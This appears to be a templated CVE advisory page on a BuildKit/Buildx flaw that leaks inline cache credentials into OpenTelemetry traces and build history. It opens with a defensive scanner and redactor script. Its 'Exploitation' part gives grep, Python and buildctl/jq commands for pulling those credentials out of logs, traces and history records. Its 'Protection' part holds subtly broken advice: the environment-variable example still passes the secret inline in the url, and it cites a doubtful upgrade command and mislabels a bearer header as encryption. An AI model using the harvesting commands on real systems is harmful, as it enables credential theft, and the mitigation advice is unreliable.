How the CVE Works:
CVE-2024-XXXX is a critical vulnerability in BuildKit, a toolkit for building container images. The issue arises when cache backend credentials are configured by setting secrets directly as attribute values in `cache-to` or `cache-from` configurations. Because the arguments and flags of traced CLI commands are recorded as part of the trace, these sensitive values can be captured in OpenTelemetry traces. If the traces are not properly secured, this exposes tokens and credentials to potential attackers. OpenTelemetry traces are also stored in the BuildKit daemon's history records, further increasing the risk of unauthorized access. The vulnerability does not affect tokens passed via environment variables or registry authentication.
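To check a trace export for the inline cache credentials described above, and to redact them before a command line is stored or exported, here is an added example (not code from the advisory, BuildKit or Buildx). It assumes a simplified JSON span layout with `name` and `attributes` keys, and takes the credential parameter names (`token`, `access_key_id`, `secret_access_key`, `session_token`) from the buildx cache backend documentation rather than from this page.

```python
import json
import re

# Cache backend parameters that carry credentials when passed inline on the CLI.
# Assumption: names are taken from buildx cache backend docs, not from the advisory.
SECRET_KEYS = {"token", "access_key_id", "secret_access_key", "session_token"}
# Matches both "--cache-to=type=...,token=..." and "--cache-to type=...,token=..." forms.
CACHE_FLAG_RE = re.compile(r"(--cache-(?:to|from)[= ])(\S+)")


def find_inline_cache_secrets(command_line):
    """Return {key: value} for credential-bearing cache-to/cache-from attributes."""
    found = {}
    for _, attrs in CACHE_FLAG_RE.findall(command_line):
        for item in attrs.split(","):
            key, sep, value = item.partition("=")
            if sep and key in SECRET_KEYS and value:
                found[key] = value
    return found


def redact_command_line(command_line):
    """Mask credential values in cache flags before the line is stored or exported."""
    def _redact(match):
        items = []
        for item in match.group(2).split(","):
            key, sep, _ = item.partition("=")
            items.append(f"{key}=***" if sep and key in SECRET_KEYS else item)
        return match.group(1) + ",".join(items)
    return CACHE_FLAG_RE.sub(_redact, command_line)


def scan_spans(spans):
    """Flag spans whose string attributes contain inline cache credentials."""
    # Assumption: each span is a dict with "name" and an "attributes" mapping (a
    # simplified JSON span export); real exporter layouts vary, so adapt the accessors.
    findings = []
    for span in spans:
        for attr_name, value in span.get("attributes", {}).items():
            if isinstance(value, str):
                leaked = find_inline_cache_secrets(value)
                if leaked:
                    findings.append((span.get("name"), attr_name, sorted(leaked)))
    return findings


# Constructed sample export (not real trace data): the first span leaks a token
# inline, the second uses registry auth and records nothing sensitive.
SAMPLE_SPANS = json.loads("""[
  {"name": "buildx build", "attributes": {"args": "docker buildx build --cache-to=type=gha,token=ghs_EXAMPLETOKEN,url=https://cache.example ."}},
  {"name": "buildx build", "attributes": {"args": "docker buildx build --cache-to type=registry,ref=registry.example/app:cache ."}}
]""")
```

Run `scan_spans(SAMPLE_SPANS)` to list the leaking span and attribute, and `redact_command_line` on any recorded command line to strip the values before they reach a trace or history record.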
DailyCVE Form:
Platform: BuildKit
Version: < v0.21.3
Vulnerability: Information Disclosure
Severity: Critical
Date: 2024-XX-XX
What Undercode Says:
Exploitation:
1. Exploit Command:
Attackers can extract sensitive credentials from OpenTelemetry traces or BuildKit history records using:
grep -r "cache-to" /path/to/buildkit/logs
This searches for cached credentials in logs.
2. Code to Extract Traces:
import json

# Load the exported trace file (the path is the author's placeholder).
with open("/path/to/otel/traces.json", "r") as f:
    traces = json.load(f)

# Match on the serialized span rather than one attribute key, since exporter
# layouts differ and the key name is not fixed.
for trace in traces:
    if "cache-to" in json.dumps(trace):
        print(trace)
This script reads OpenTelemetry traces to identify exposed credentials.
3. Exploit via BuildKit History:
Attackers can query BuildKit history records using:
buildctl debug history --format json | jq '.[] | select(.args | contains("cache-to"))'
This filters history records for sensitive data.
Protection:
1. Update BuildKit:
Upgrade to Buildx v0.21.3 or later:
docker buildx upgrade
2. Secure Traces:
Encrypt OpenTelemetry traces using:
exporters:
  otlp:
    endpoint: "otel-collector:4317"
    headers:
      authorization: "Bearer <secure-token>"
3. Avoid CLI Arguments for Secrets:
Use environment variables instead:
export CACHE_CREDENTIALS="secure-token"
docker buildx build --cache-to type=gha,url=$CACHE_CREDENTIALS .
4. Restrict Access to BuildKit Logs:
Set strict permissions on BuildKit logs:
chmod 600 /var/lib/buildkit/.log
5. Monitor for Unauthorized Access:
Use auditd to monitor BuildKit logs:
auditctl -w /var/lib/buildkit/ -p rwxa -k buildkit-access
6. Patch References:
Apply the official patch from the BuildKit GitHub repository:
git clone https://github.com/moby/buildkit.git
cd buildkit
git checkout v0.21.3
By following these steps, users can mitigate the risks associated with CVE-2024-XXXX and secure their BuildKit environments.
References:
Reported By: https://github.com/advisories/GHSA-m4gq-fm9h-8q75